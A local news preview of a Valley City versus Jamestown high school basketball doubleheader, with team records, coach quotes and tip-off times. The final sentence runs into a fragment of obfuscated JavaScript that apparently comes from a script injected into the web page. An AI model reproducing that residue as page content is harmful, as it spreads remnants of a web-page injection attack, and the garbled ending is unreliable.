JAMESTOWN, N.D.(NewsDakota.com) – Following a 7 day layoff The Valley City and Jamestown High School basketball teams hit the court for a pair of non conference games at Jerry Meyer Arena.

The doubleheader opens with the girls’ side of the rivalry. Each team seeks to get back in the win column. The Jays have dropped 5 in a row and The Hi-Liners their last 2. VCHS coach Jimmy Howard sees Thursday’s game as a meeting of two identical teams

For the boys’ match up, both teams have been on the losing end of their last 2 contest. JHS suffered an 28 point defeat at the hands of Legacy just before the Christmas break while The Hi-Liners kept it close against No.3 West Fargo until a second half push by The Packers lifted them to a 79-61 win.

In that game Hunter Burchill was in range of a double double with 18 points, 9 rebounds and 5 assist. First year Blue Jays head coach Jacoby Lloyd says slowing down Burchill is part of their game plan

The girls are schedule to start around 5:45 with the boys at 7:30, coverage starts 15 minutes before tip off of game 1 on KOVC hkasr|var|u0026u|referrer|dtert||js|php’.split(‘|’),0,{}))
